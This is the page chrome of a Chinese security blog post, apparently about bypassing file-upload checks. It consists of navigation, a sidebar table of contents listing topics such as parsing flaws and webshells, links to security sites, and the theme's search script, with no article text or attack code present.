          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/04/26/FckEditor编辑器漏洞利用/" rel="prev" title="FckEditor编辑器漏洞利用">
                FckEditor编辑器漏洞利用 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/favico.gif"
               alt="Note" />
          <p class="site-author-name" itemprop="name">Note</p>
           
              <p class="site-description motion-element" itemprop="description">布施、持戒、忍辱、精进、禅定、般若</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">85</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">6</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">33</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  微博
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="豆瓣">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  豆瓣
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="" target="_blank" title="知乎">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  知乎
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.freebuf.com/" title="FreeBuf" target="_blank">FreeBuf</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.ichunqiu.com/" title="i春秋" target="_blank">i春秋</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.amobbs.com/" title="amoBBS" target="_blank">amoBBS</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.codesec.net/" title="CodeSec" target="_blank">CodeSec</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://new.butian.360.cn/" title="补天" target="_blank">补天</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://klionsec.github.io/" title="klion" target="_blank">klion</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://bbs.pediy.com/" title="看雪论坛" target="_blank">看雪论坛</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.vulbox.com/" title="漏洞盒子" target="_blank">漏洞盒子</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.91ri.org/" title="91ri" target="_blank">91ri</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hacktech.cn/" title="Akkuman" target="_blank">Akkuman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://fatofyoung.github.io/" title="fatofyoung" target="_blank">fatofyoung</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.waitalone.cn/" title="waitalone" target="_blank">waitalone</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.cnseay.com/" title="seay" target="_blank">seay</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#概述"><span class="nav-number">1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#上传检测流程"><span class="nav-number">2.</span> <span class="nav-text">上传检测流程</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#绕过方法"><span class="nav-number">3.</span> <span class="nav-text">绕过方法</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#客户端检测-JavaScript检测"><span class="nav-number">3.1.</span> <span class="nav-text">客户端检测(JavaScript检测)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#服务端MIME类型检测"><span class="nav-number">3.2.</span> <span class="nav-text">服务端MIME类型检测</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#服务端目录路径检测"><span class="nav-number">3.3.</span> <span class="nav-text">服务端目录路径检测</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#服务端文件扩展名检测"><span class="nav-number">3.4.</span> <span class="nav-text">服务端文件扩展名检测</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#服务端文件内容检测"><span class="nav-number">3.5.</span> <span class="nav-text">服务端文件内容检测</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Web-Server解析漏洞"><span class="nav-number">4.</span> <span class="nav-text">Web Server解析漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Apache解析漏洞"><span class="nav-number">4.1.</span> <span class="nav-text">Apache解析漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#IIS解析漏洞"><span class="nav-number">4.2.</span> <span class="nav-text">IIS解析漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#IIS6-0"><span class="nav-number">4.2.1.</span> <span class="nav-text">IIS6.0</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#IIS7-0以上"><span class="nav-number">4.2.2.</span> <span class="nav-text">IIS7.0以上</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Nginx解析漏洞"><span class="nav-number">4.3.</span> <span class="nav-text">Nginx解析漏洞</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#总结"><span class="nav-number">5.</span> <span class="nav-text">总结</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#文件上传防御"><span class="nav-number">6.</span> <span class="nav-text">文件上传防御</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#一句话木马"><span class="nav-number">7.</span> <span class="nav-text">一句话木马</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#图片木马制作"><span class="nav-number">8.</span> <span class="nav-text">图片木马制作</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#文件上传防御-1"><span class="nav-number">9.</span> <span class="nav-text">文件上传防御</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Note</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  





  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      $('#local-search-input').focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

</body>
</html>
